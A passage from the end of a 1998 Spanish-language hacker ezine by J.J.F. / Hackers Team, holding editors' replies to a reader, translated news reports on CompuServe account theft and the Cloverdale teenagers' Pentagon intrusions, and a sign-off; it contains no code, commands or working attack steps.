  13681.   PD: el doc de Daemon sobre hackear Unix me parecio excelente tambien. Pero
  13682.   la idea de que hay poco escrito sobre como hackear desde Win 95 o como
  13683.   hackearlo es muy fuerte... 
  13684.  
  13685.   <------>
  13686.  
  13687.   [ Nosotros por el momento no tenemos pensado sacar una guia sobre hack en
  13688.     win95 pero nunca sa sabe. Si no recuerdo mal si se puede hacer esos
  13689.     ataques desde un win95 a otro ya que si existen programas para ello,
  13690.     pero tambien hay que decir que estar perdiendo el tiempo en nukes y
  13691.     similiares es una tonteria, hay cosas mejores en las que perder el tiempo.
  13692.     Decirte que en NT si que estamos trabajando por lo que el algun tiempo
  13693.     ya daremos alguna sorpresa ;-) ]
  13694.  
  13695.   [ Nobody : Pues thx y a lo mejor si que aparece una 2 parte ya que lo tenia
  13696.     pensado cuando acabe la primera :)) y si que se puede el IP-spoof en win
  13697.     y eso seria una de las cosas incluidas, pero ya veremos ya que estoy
  13698.     bastante ocupado.
  13699.     Y como primicia te dire que a lo mejor saco dentro de una temporada una
  13700.     guia de hacking con el s.o. Inferno ;-) pero ya se vera.
  13701.     Yo prefiero Unix que win pero al ver que poca informacion hay sobre el
  13702.     hacking en win, por eso decide escribir esta guia, la cual por lo visto
  13703.     esta agrando mucho y eso es bueno :)
  13704.     Byes. ]
  13705.  
  13706. <────────────────────────────────────────────────────────────────────────────>
  13707. ██████████████████████████████████████████████████████████████████████████████
  13708. <────────────────────────────────────────────────────────────────────────────>
  13709.  
  13710.                            ------------------------
  13711.                            - NOTICIAS UNDERGROUND -
  13712.                            ------------------------
  13713.   
  13714.                                                 - J.J.F. / HACKERS TEAM -
  13715.  
  13716. <────────────────────────────────────────────────────────────────────────────>
  13717.   EX-AGENTES DEL KGB ENVUELTOS EN DELITOS INFORMATICOS.
  13718.  
  13719.         Experimentados agentes del KGB, quienes durante la Guerra Fria
  13720.   adquirieron elevados conocimientos estan siendo acusados por el crecimiento
  13721.   de delitos informaticos provenientes del Este de Europa.
  13722.  
  13723.         Uno de los usarios de Internet afectados lucha contra una factura de
  13724.   1800 dolares alegando que ella es victima de estos hackers entrenados por
  13725.   el gobierno, que ahora estan relacionados con la Mafia Rusa y otros
  13726.   paises del Este.
  13727.          
  13728.         Mary Picken, un usuario de CompuServe, cree que ellos decodificaron
  13729.   su password y usaron su cuenta incrementando su factura, que tarifa unas
  13730.   1000 horas de conexion a Internet desde alguna terminal del Este de
  13731.   Europa.
  13732.  
  13733.         Picken, quien esta a punto de ser expulsada de su trabajo en la
  13734.   oficina de arte STUC, insiste que ella nunca ha accedido al sistema desde
  13735.   fuera de UK y tampoco a relevado su contraseña a nadie jamas.
  13736.  
  13737.         CompuServe se niega a admitir culpabilidad. La compañia le a ofrecido
  13738.   un credito del 50% como un gesto de buena voluntad, pero dice que no cree
  13739.   que haya habido una brecha de seguridad. Por el contrario, CompuServe asume
  13740.   que Picken uso su cuenta mientras viajaba por el extranjero o autorizo el
  13741.   uso de su cuenta a alguien o divulgo su clave a una tercera parte.
  13742.  
  13743.         Sin Embargo, existen evidencias de que otros usuarios de
  13744.   CompuServe han sufrido casos similares.
  13745.  
  13746.         Dr Neil Barret, uno de los mejores expertos en seguridad informatica
  13747.   de UK, conto al Scotland el domingo, que puede ser posible para
  13748.   experimentados Hackers robar cuentas de Internet por la red.
  13749.  
  13750.         "Existe un amplio rango de metodos que pueden ser usados pero uno de
  13751.   los favoritos es un programa sniffer que se instala para buscar
  13752.   determinados patrones en una seccion de codigo", explico.
  13753.  
  13754.         "Otro metodo es conducir a una persona a un determinado lugar en
  13755.   Internet y obligarles a dejar sus datos personales. Si dejamos nuestra
  13756.   cuenta de correo en algun lugar ya damos mucha informacion sobre nosotros.
  13757.   Tambien es posible esperar por alguna informacion en particular para
  13758.   luego ser enviada o haver sido programado para ir a un lugar espeficico de
  13759.   nuestro ordenador para coger nuestra contraseña y datos personales."
  13760.  
  13761.         En pleno debate alrededor de CompuServe, un hombre conocido
  13762.   unicamente como Tom describe como un amigo suyo a vistado un servidor en
  13763.   el cual se anunciaba un ordenador gratis.
  13764.  
  13765.         Despues de dejar su direccion de correo, la factura de su cuenta de
  13766.   Internet comenzo a incrementarse desde algun lugar de Europa.
  13767.  
  13768.         El Centro para Estudios Estrategicos Internacionales, un tanque ligero
  13769.   de Washington con cierta relacion con la Agencia de Inteligencia, sostiene
  13770.   que el Bloque del Este es uno de los centros mas proliferos de hacking del
  13771.   mundo. Barret dice que las cuentas de Internet hackeadas son vendidas por
  13772.   criminales, envueltos desde el transporte de software pirateado hasta
  13773.   el trafico de drogas.
  13774.  
  13775.         Este fraude es el desarrollo de otra forma de las telecomunicaciones.
  13776.   En uno de sus mas recientes casos, un grupo de hackers cargaba las tarjetas
  13777.   del gigante AT&T, una empresa de telecomunicaciones de los EE.UU. El uso
  13778.   de estas tarjetas le cuesta a la compañia 78 millones de dolares.
  13779.  
  13780.         Picken se puso en contacto con la policia pero como su cuenta fue
  13781.   usada en el extranjero la policia no puede investigar. Ademas CompuServe se
  13782.   niega a explicar desde donde fue la conexion exactamente por lo no es
  13783.   posbile denunciarlo a la Interpol o a la propia policia del pais envuelto.
  13784.  
  13785.   SCOTLAND ON SUNDAY 15/02/98 P6 
  13786.  
  13787. <────────────────────────────────────────────────────────────────────────────>
  13788.   EL PENTAGONO ATACADO POR HACKERS.
  13789.  
  13790.         Las redes informaticas desclasificadas del Pentagono fueran dañadas
  13791.   por "unos ataques ciberneticos" de parte de unos hackers durante el
  13792.   reciente conflicto del Golfo Persico, revelo ayer un oficial del
  13793.   departamento de defensa. El asalto en uno de los sistemas informaticos mas
  13794.   seguros del ejercito de los Estados Unidos durante las 2 ultimas semanas
  13795.   fue "el mejor ataque organizado sistematicamente sufrido por el Pentagono
  13796.   hasta la fecha actual", dijo John Hamre, el delegado de la Secretaria de
  13797.   Defensa.
  13798.  
  13799.         Pero los ataques, que estan siendo investigados por el Pentagono,
  13800.   el FBI y por el departamento de justicia, parece que no tiene relacion
  13801.   directa con el conflicto Iraqui. Tiene toda "la apariencia de ser un juego"
  13802.   y que fue perpretado "por un numero reducido de individuos", dice el. El
  13803.   ataques de los hackers se concentro en los sistemas desclasificados del
  13804.   Pentagono, como personal y nominas, dice el señor Hamre. Todos los servicios
  13805.   del Pentagono fueron "penetrados en algun grado". Aunque "fueron muchos y
  13806.   bastante sofisticados", el considera los ataques como de "mirones o
  13807.   vandalismo".
  13808.  
  13809.         "Nuestras redes clasificadas estan intactas y no han sido penetradas"
  13810.   , dijo el señor Hamre. Estos ataques demuestran el devastador potencial de
  13811.   los asaltos de los Hackers y "cyber terroristas". En el ultimo Octubre, la
  13812.   comision del presidente Bill Clinton encargada de la proteccion de
  13813.   infraestructura critica manifesto que "el potencial de desastre es real".
  13814.   El informe, por el ya retirado general Robert Marsh de las fuerzas aereas,
  13815.   revelo un plan de cinco años para incrementar la seguridad en sistemas
  13816.   sensibles del gobierno y compañias privadas de defensa, energia, bancos y
  13817.   compañias telefonicas.
  13818.  
  13819.         En Diciembre, ministros de justicia y de interior del Grupo de los
  13820.   Siete encargados del poder economico, incluido el secretario de la Casa
  13821.   Blanca, Jack Straw, firmaron un acuerdo en Washington para coordinar los
  13822.   esfuerzos contra el delito digital.
  13823.  
  13824.   GUARDIAN 26/02/98 P14 
  13825.  
  13826. <────────────────────────────────────────────────────────────────────────────>
  13827.   EL FBI ORGANIZA UNA ENORME REDADA PARA ATRAPAR UNOS ADOLESCENTES DE UN
  13828.                             PUEBLECITO.
  13829.  
  13830.   COMTEX NewswireTuesday, March 03, 1998 12:52:00 AM 
  13831.  
  13832.   ZDNet News (February 27, 1998) - 
  13833.  
  13834.         El FBI estuvo durante seis semanas dedicando mas de 20 agentes en un
  13835.   esfuerzo de detener a una serie de individuos organizados los cuales
  13836.   penetraron el Pentagono. Pasado dos noches de la penetracion, la agencia
  13837.   se encontro que despues de todo el proceso de investigacion los intrusos
  13838.   resultasen ser un grupo de niños.
  13839.  
  13840.         Durante la detencion, los agentes cogieron a los adolescentes,
  13841.   identificando a un estudiante escolar de 15 o 16 años, en el proceso de
  13842.   entrar en sistemas informaticos no-clasificados. Una segunda redada fue
  13843.   llevada en la casa de otro adolescente sospechoso de tomar parte en la
  13844.   penetracion del Pentagono. La redada fue llevada a cabo en Cloverdale,
  13845.   un pueblo de 5000 residentes a unas 100 millas del norte de San Francisco.
  13846.  
  13847.         Los dos adolescentes, al ser menores, no fueron arrestados, pero el
  13848.   FBI confisco sus equipos informaticos y software en ambas casas. "Son
  13849.   buenos chicos", decia Michael Carey, el superintendente del distrito escolar
  13850.   de Cloverdale. "Espero que no haya cargos contra ellos".
  13851.  
  13852.         Con esto finaliza un capitulo en la investigacion de diversas
  13853.   penetraciones en los ordenadores desclasificados del Pentagono. La redada
  13854.   ocurrio un dia despues de que el delegado de la Secretaria de Defensa John
  13855.   Hamre revelase que 11 sistemas desclasificados del Pentagono han sido
  13856.   penetrados durante este mes.
  13857.  
  13858.         De acuerdo con las investigaciones federales, otros estudiantes de
  13859.   Cloverdale estan siendo interrogados por el Servicio Secreto y por agentes
  13860.   del FBI. Se sospecha que los actos de hacking fueron llevados a cabo por un
  13861.   grupo de jovenes, quienes luchaban haber quien penetraba antes en los
  13862.   ordenadores del gobierno.
  13863.  
  13864.         "La mayoria de aqui piensa que esto fue una especie de concurso
  13865.   informatico" decia un estudiante del colegio superior de Cloverdale. A
  13866.   principios de este semana, Hamre el delegado de la Secretaria de Defensa
  13867.   dijo que la penetracion fue "el mejor ataque organizado sistematicamente
  13868.   sufrido por el Pentagono hasta la fecha actual".
  13869.  
  13870.         "Esto dice cosas sorprendentes de la habilidad de los chicos y
  13871.   tambien la poca seguridad que tiene el Pentagono" decia un Hacker que no
  13872.   tiene relacion con los incidentes, que prefiere ser conocido con su apodo,
  13873.   darkcube. Pero la cazeria todavia no ha finalizado, segun Bill Zane, quien
  13874.   tiene un Servidor de Internet llamado Netdex con 3000 usuarios en Santa
  13875.   Rosa, California. Los hackers aparentemente entraron en Netdex para
  13876.   dirigirse al Pentagono. De hecho, Zane posiblemente fue el primero que
  13877.   aviso sobre los intrusos. "Hay por lo menos uno o como mucho dos mas
  13878.   todavia libres", decia Zane. "No solo son estos dos chicos."
  13879.  
  13880.         Zane, junto a los administradores del MIT (Massachusetts Institute of
  13881.   Technology) y de la Universidad de Berkely, monotorizaron a los intrusos y
  13882.   picharon sus comunicaciones. Esto mensajes junto a los distintos metodos
  13883.   de operar hace creer a Zane que hay mas gente inculpada en el caso y que
  13884.   ademas son adultos.
  13885.  
  13886.         "Los metodos fueron mas sofisticados y mucho mas serios", decia.
  13887.  
  13888.         Para estos dos jovenes hackers, cuyos crimenes pueden haver cometido.
  13889.   "Yo estaria mas concienciado si hubieran hackeado el sistema del colegio o
  13890.   cambiado las notas," decia el Superintendente Carey. "Fue mas un inocente
  13891.   juego que un ataque malicioso."
  13892.   
  13893.   Copyright (c) 1998 Ziff-Davis Publishing Company. All rights reserved.
  13894.  
  13895.   For additional Ziff-Davis online information, access Ziff-Davis on
  13896.   Compuserve (GO ZIFFNET) or ZD Net on the Internet (http://www.zdnet.com)
  13897.  
  13898.   Copyright 1998
  13899.  
  13900. <────────────────────────────────────────────────────────────────────────────>
  13901.   HABLA EL HACKER DEL PENTAGONO.
  13902.  
  13903.   WIRED Internet
  13904.   
  13905.   12:17pm 
  13906.  
  13907.         Uno de los dos adolescentes detenidos la semana pasado por el FBI
  13908.   por hackear servidores del gobierno dijo que el seguia teniendo acceso de
  13909.   administrador en cientos de redes gubernamentales y militares.
  13910.   Adicionalmente, los colegas del joven dijeron, que se havia
  13911.   sensacionalizado la historia en los medios de comunicacion, y que estaban
  13912.   planeado "venganzas electronicas."
  13913.  
  13914.         EL hacker, que operaba bajo el apodo de Makeveli, hizo diversos
  13915.   comentarios en diferentes conversaciones telefonicas e intercambios de
  13916.   email con John Vranesevich, fundador del grupo de seguridad informatica
  13917.   AntiOnline.
  13918.  
  13919.         Vranesevich ha publicado diversos extractos de sus conversaciones con
  13920.   Makeveli en su pagina web, que esta dedicada a educar al publico sobre
  13921.   cuestion de seguridad informatica. Durante el curso de cinco conversaciones
  13922.   telefonicas, el joven, un junior en la escuela superior de Cloverdale,
  13923.   California, dijo que enviaria una cinta sobre su encuntro con el FBI la
  13924.   semana pasada.
  13925.  
  13926.         "Ellos vinieron a mi casa, me retuvieron en el salon, y empezaron a
  13927.   sacar todo el equipo informatico de mi cuarto," contaba Makaveli a
  13928.   Vranesevich. "Ni siquiera dejaron el cable que conectaba la pared con el
  13929.   modem". "Tambien cogieron todos mis CD's - CDs musicales, CDs de ordenador,
  13930.   mi impresora, altavoces, todo," decia Makaveli.
  13931.  
  13932.         Vranesevich dijo que Makaveli le dijo que el y su compañero, quien
  13933.   operaba bajo el apodo de TooShort, ambos viven en el mismo vecendario y
  13934.   ambos fueron visitados por los agentes federales la misma noche.
  13935.  
  13936.         "Ellos estaban muy confudidos por el modo que en el FBI les trataba,
  13937.   los jovenes usaron la palabra 'de asperos'," dijo Vranesevich, que dijo que
  13938.   Makaveli contacto con el por la reputacion de AntiOnline en la comunidad
  13939.   hacker y su alto conocimiento sobre cuestiones de seguridad informatica.
  13940.  
  13941.         Makaveli nunca fue esposado, ni siquiera arrestado. Aunque todo su
  13942.   equipo fue confiscado por los agentes, de acuerdo con Vranesevich, el
  13943.   joven sigue teniendo acceso a Internet en la escuela, y hoy mismo le a
  13944.   enviado correo.
  13945.  
  13946.         "Una de las cosas (los agentes) que repetian una y otra vez era 'LLNL'
  13947.   (Lawrence Livermore National Laboratory) - ellos querian saber si el havia
  13948.   leido algun fichero de alli, si se acordaba del nombre de algun fichero o
  13949.   carpeta, y si sabia si hubiese algo clasificado," dijo Vranesevich.
  13950.  
  13951.         La semana pasada el delegado de la Secretaria de Defensa John Hamre
  13952.   dijo a los periodistas que durante las recientes semanas el Pentagono ha
  13953.   sido objeto de los mas sofisticados y organizados ataques hasta la fecha.
  13954.   Pero segun Vranesevich, Makaveli le dijo que Hamre estaba generalizando.
  13955.  
  13956.         "Por lo que parece que cualquier servidor .gov o .mil es un servidor
  13957.   del Pentagono," decia Makaveli, refiriendose a los cientos de maquinas que
  13958.   son clasificadas como gubernamentales o militares, pero podian ser
  13959.   cualquier cosa desde servidores del Departamento de Agricultura, hasta
  13960.   web's de reclutamiento del ejercito.
  13961.  
  13962.         Hamre dijo que ningun sistemas clasificado a sido accedido, pero
  13963.   Makaveli no esta de acuerdo.
  13964.                                                                     
  13965.         "Uno de los sitios que (los agentes del FBI) estuvieron preguntando
  13966.   repetidas veces era uno de los llamados 'clasificados.' Era el LLNL."
  13967.                                
  13968.         Vranesevich dijo que Makaveli le dijo a los agentes que no sabia que
  13969.   maquinas o ficheros eran clasificados, pero que el habia obtenido root -
  13970.   o privilegios de administrador - en cientos de maquinas, incluidas aquellas
  13971.   en el Lawrence Livermore Lab.
  13972.                                                                              
  13973.         "El sentia que (los agentes del FBI) trataban de ir tras el otro
  13974.   chico que era de un pais extranjero, quien era su mentor" dijo Vranesevich.
  13975.                                           
  13976.         "El me conto que este chico 'era tan bueno, que jamas lo encontraran,'
  13977.   dijo Vranesevich. "[Makaveli dijo] Yo no se quien es realmente, pero viene
  13978.   de un pais en el cual, si alquien sipiese quien es, le disparaian un tiro
  13979.   en la cabeza. Por eso se a de protejerse tan bien," le conto Makaveli a
  13980.   Vranesevich.
  13981.                             
  13982.         El joven experto en seguridad dijo que su historia a sido mal enfocada
  13983.   por los medios de comunicaciones, el gobierno, y por el dueño del Servidor
  13984.   de Internet en Santa Rosa.
  13985.  
  13986.         "Ese tio (Bill Zane el dueño de Netdex) este fuera de onda - y nada de
  13987.   hack fue cometido alli," le conto Makaveli a Vranesevich. Por el contrario,
  13988.   el joven admitio de haver obtenido privilegios de administrador en los
  13989.   servidores de Netdex y haver instalado las herramientas de seguridad que
  13990.   despues Zane se jacta de haver usado para perseguirlos.
  13991.  
  13992.         Zane conta a Wired News que Makaveli "uso varias maquinas, incluido
  13993.   las nuestras, en una secuencia de telnets para sus actos hacking," aseguro
  13994.   el a la revista. Ademas confirmo que Makaveli havia obtenido root en sus
  13995.   servidores, pero ya no lo tiene mas.
  13996.                                     
  13997.         Vranesevich dijo que mientras los servidores de web no contengan
  13998.   ningun fichero sensible, suelen ser usados para saltar entre diversos
  13999.   sistemas dentro de una red." (Makaveli y TooShort) saltaban de una maquina
  14000.   a otra, porque asi esto les permite tener acceso valido a un host (que
  14001.   generalmente requiere venir de un sitio interno de la red) para acceder a
  14002.   otra maquina" comenta Vranesevich.
  14003.              
  14004.         Zane se niega a explicar las tecnicas de Makaveli, o sus tecnicas de
  14005.   seguridad, y ademas se queja del poco cuidado por parte de sus padres y
  14006.   profesores.
  14007.                                  
  14008.         "Para usar la autopista de la informacion como una metafora, tu no
  14009.   pones a un chico en un coche y le dejas conducir por la autopista," dice
  14010.   Zane, quien dice que las actividades en Intenet de los chicos tendria que
  14011.   estar supervisada. "Una cosa es usar los ordenadores en un lugar, y otra
  14012.   usarlos en Internet," dice Zane
  14013.  
  14014.         Makaveli conto en entrevistas anteriores que su notivacion fue
  14015.   de caracter politico. "Es poder, ya sabes, poder" dice el, refiriendose a
  14016.   la busqueda del conocimiento que mueve a los Hackers a cometer actos
  14017.   ilicitos.
  14018.  
  14019.         Vranesevich dijo que Makaveli y TooShort no tienen sorprendentes
  14020.   habilidades, ellos fueron cogidos y se predente que sean un modelo. 
  14021.  
  14022.         "No hay nada de especial en gente como Makaveli que sabe como
  14023.   penetrar un sistema, luego se resienten de las consecuencias," dice
  14024.   Vranesevich.
  14025.                            
  14026.         Makaveli termino su conversacion sugiriendo que sus amigos en la
  14027.   comunidad hacker estaban considerando una posible venganza - ya que todavia
  14028.   tienen un as en la manga.
  14029.                                
  14030.         "Me gustaria avisar al FBI, que todavia hay muchos servidores
  14031.   hackeados que ellos no saben, pero pronto se daran cuenta de ello," le
  14032.   conto Makaveli a Vranesevich. 
  14033.  
  14034. <────────────────────────────────────────────────────────────────────────────>
  14035. ██████████████████████████████████████████████████████████████████████████████
  14036. <────────────────────────────────────────────────────────────────────────────>
  14037.  
  14038.         Bueno chicos, pues aqui acaba el numero cuatro de nuestro/vuestro
  14039.   ezine y esperamos que os haya gustado y que vuestros conocimientos hayan
  14040.   mejorado en mayor grado o por lo menos un poco ;-)
  14041.  
  14042.         Despues de este magnifico numero (o eso pensamos :) tendreis que
  14043.    esperar unos dos meses para el siguiente, que conste que intentamos que
  14044.    sea el menor tiempo posible, pero eso depende de vuestra colaboracion con
  14045.    el ezine o sea que ya sabeis!!
  14046.  
  14047.         Y como siempre decimos, enviarnos vuestros articulos, sugerencias,
  14048.   criticas, propuestas, actos de hacking }:-) o lo que quieras para ir
  14049.   mejorando el ezine, a la siguiente direccion :
  14050.  
  14051.   jjf_team@usa.net
  14052.  
  14053.                          ADIOS Y HASTA EL SIGUIENTE NUMERO!!!
  14054.                                - J.J.F. / HACKERS TEAM -
  14055.  
  14056. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
  14057.